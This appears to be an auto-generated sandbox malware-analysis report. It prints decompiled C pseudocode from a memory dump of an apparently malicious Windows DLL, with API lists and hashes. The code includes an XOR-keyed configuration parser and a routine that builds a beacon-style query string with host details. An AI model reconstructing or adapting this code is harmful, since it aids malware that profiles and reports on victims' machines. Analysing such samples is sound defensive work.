                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          								_t13 = _t58 + 0x4c0e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4c0c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E04C09135( ~_v8 &  *0x4c0d270,  &E04C0D00C); // executed
                                                          								_t54 = E04C0888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E04C087AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E04C051B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E04C01C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x4c0d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E04C0A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 04C06C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04C05BBB,00000000,00000000), ref: 04C06C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04C05C38
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • memset.NTDLL ref: 04C05C87
                                                          • RtlInitializeCriticalSection.NTDLL(06889570), ref: 04C05C98
                                                            • Part of subcall function 04C01C66: memset.NTDLL ref: 04C01C7B
                                                            • Part of subcall function 04C01C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C01CBD
                                                            • Part of subcall function 04C01C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04C01CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04C05CC3
                                                          • wsprintfA.USER32 ref: 04C05CF3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: ec1aadc050d417f85d25865dd7854e1c410257473ded45536ad1158c1f427b7b
                                                          • Instruction ID: b3c77289a0170512dd00e9688a5ea03d58e282bd39a8d94a9d1b88d55a694f45
                                                          • Opcode Fuzzy Hash: ec1aadc050d417f85d25865dd7854e1c410257473ded45536ad1158c1f427b7b
                                                          • Instruction Fuzzy Hash: F651A375A00318BBEB21DBE4D94CB6E77BAEB08704F05C826E502D71C0E678BE859F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E04C062DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E04C0A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E04C0A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E04C0A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x4c0d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}






















                                                          APIs
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04C063D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 04C063EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04C06403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04C06427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x4c0d23c) == 0) {
                                                          						E04C01B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x4c0d23c) == 1) {
                                                          						_t10 = E04C012E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(04C0D23C), ref: 04C04EDF
                                                            • Part of subcall function 04C012E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C012F8
                                                          • InterlockedDecrement.KERNEL32(04C0D23C), ref: 04C04EFF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E04C08D14(void* __edx) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E04C0A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t4 = _t24 + 0x4c0edc0; // 0x6889368
                                                          				_t5 = _t24 + 0x4c0ed68; // 0x4f0053
                                                          				_t45 = E04C05356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					 *0x4c0d108(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t11 = _t32 + 0x4c0edb4; // 0x688935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x4c0ed68; // 0x4f0053
                                                          						_t52 = E04C045C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          							_t13 = _t35 + 0x4c0edfe; // 0x30314549
                                                          							if(E04C08E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x4c0d25c - 6;
                                                          								if( *0x4c0d25c <= 6) {
                                                          									_t42 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          									_t15 = _t42 + 0x4c0ec0a; // 0x52384549
                                                          									E04C08E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          							_t17 = _t38 + 0x4c0edf8; // 0x68893a0
                                                          							_t18 = _t38 + 0x4c0edd0; // 0x680043
                                                          							_t45 = E04C05D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x4c0d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x4c0d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E04C04F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}


















                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068893A0,?,00000000,30314549,00000014,004F0053,0688935C), ref: 04C08E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C0523E), ref: 04C08E12
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E04C0888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x4c0d2a4; // 0x63699bc3
                                                          				if(E04C07145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x4c0d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x4c0d2a4; // 0x63699bc3
                                                          				if(E04C07145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x4c0d2a4; // 0x63699bc3
                                                          				if(E04C07145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x4c0d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t43 = E04C06B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x4c0d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t44 = E04C06B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x4c0d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t45 = E04C06B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x4c0d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t46 = E04C06B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x4c0d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t47 = E04C06B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x4c0d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t48 = E04C06B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E04C056FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E04C06702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t49 = E04C06B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E04C056FA(0, _t49) != 0) {
                                                          						_t114 =  *0x4c0d32c; // 0x68895b0
                                                          						E04C023F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x4c0d2a4; // 0x63699bc3
                                                          						_t50 = E04C06B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t20 = _t51 + 0x4c0e252; // 0x616d692f
                                                          						 *0x4c0d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E04C056FA(0, _t50);
                                                          						 *0x4c0d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x4c0d2a4; // 0x63699bc3
                                                          								_t53 = E04C06B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          								_t21 = _t54 + 0x4c0e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E04C056FA(0, _t53);
                                                          							}
                                                          							 *0x4c0d340 = _t55;
                                                          							HeapFree( *0x4c0d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}





































                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C089C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C089FB
                                                          • HeapFree.KERNEL32(00000000,04C05D25,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008,?,04C05D25), ref: 04C08AF2
                                                          • HeapFree.KERNEL32(00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008,?,04C05D25), ref: 04C08B05
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 25f02d415504f5b88b0e5bec5c1a624b47950c8d6d800e1832f7d8e9bf0a6de1
                                                          • Instruction ID: a7e295e2a91ff7aff197b60c7441366844532afbac073ce0b1f8ae73029fd834
                                                          • Opcode Fuzzy Hash: 25f02d415504f5b88b0e5bec5c1a624b47950c8d6d800e1832f7d8e9bf0a6de1
                                                          • Instruction Fuzzy Hash: 93718EB4B00115AFEB10FBF99D84A6B77EFDB48700729C961A506D7284E634FE819B30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E04C01F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x4c0d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x4c0d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x4c0d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E04C0D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t3 = _t30 + 0x4c0e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x4c0d02c,  *0x4c0d004, _t25);
                                                          				_t33 = E04C056CD();
                                                          				_t34 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t4 = _t34 + 0x4c0e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E04C058DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t6 = _t83 + 0x4c0e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x4c0d238, 0, _t96);
                                                          				}
                                                          				_t97 = E04C0A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t8 = _t78 + 0x4c0e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x4c0d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x4c0d32c; // 0x68895b0
                                                          				_a32 = E04C04622(0x4c0d00a, _t98 + 4);
                                                          				_t42 =  *0x4c0d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t11 = _t74 + 0x4c0e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x4c0d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t13 = _t71 + 0x4c0e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E04C0518F(GetTickCount());
                                                          						_t50 =  *0x4c0d32c; // 0x68895b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x4c0d32c; // 0x68895b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x4c0d32c; // 0x68895b0
                                                          						_t103 = E04C01BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x4c0c28c);
                                                          							_push(_t103);
                                                          							_t62 = E04C0361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E04C06777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E04C06761();
                                                          								}
                                                          								HeapFree( *0x4c0d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x4c0d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x4c0d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x4c0d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x4c0d238, 0, _t105);
                                                          				return _a12;
                                                          			}

                                                          APIs
